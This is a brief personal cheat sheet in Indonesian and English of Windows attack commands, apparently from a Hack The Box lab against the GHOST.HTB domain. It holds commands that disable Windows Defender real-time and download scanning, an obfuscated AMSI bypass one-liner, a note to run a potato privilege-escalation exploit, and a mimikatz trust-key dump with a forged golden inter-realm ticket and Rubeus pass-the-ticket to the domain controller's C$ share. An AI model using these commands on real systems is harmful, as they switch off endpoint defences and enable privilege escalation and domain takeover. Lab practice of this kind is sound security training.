1. bypass proteksi AV windows
1. powershell -ep bypass
2. Set-MpPreference -DisableIOAVProtection $true -Verbose
3. Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
4. S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x')) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE (('1Q'+'2U')+'zX' ) -VaL)."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'))."sE`T`VaLUE"(${n`ULl},${t`RuE} )

2. show running prog 
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

3. reboot langsung => shutdown /r /t 0

4. systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
5. cek instaled driver on system: driverquery /v

6. privilege
seimpersonate aktif -> execute potato di target

7.golden ticket
mimikatz -> lsadump::trust /patch

mimikatz -> kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:kuskus.kirbi

.\Rubeus.exe asktgs /ticket:kuskus.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt

test -> dir \\DC01.ghost.htb\C$\Users\Administrator
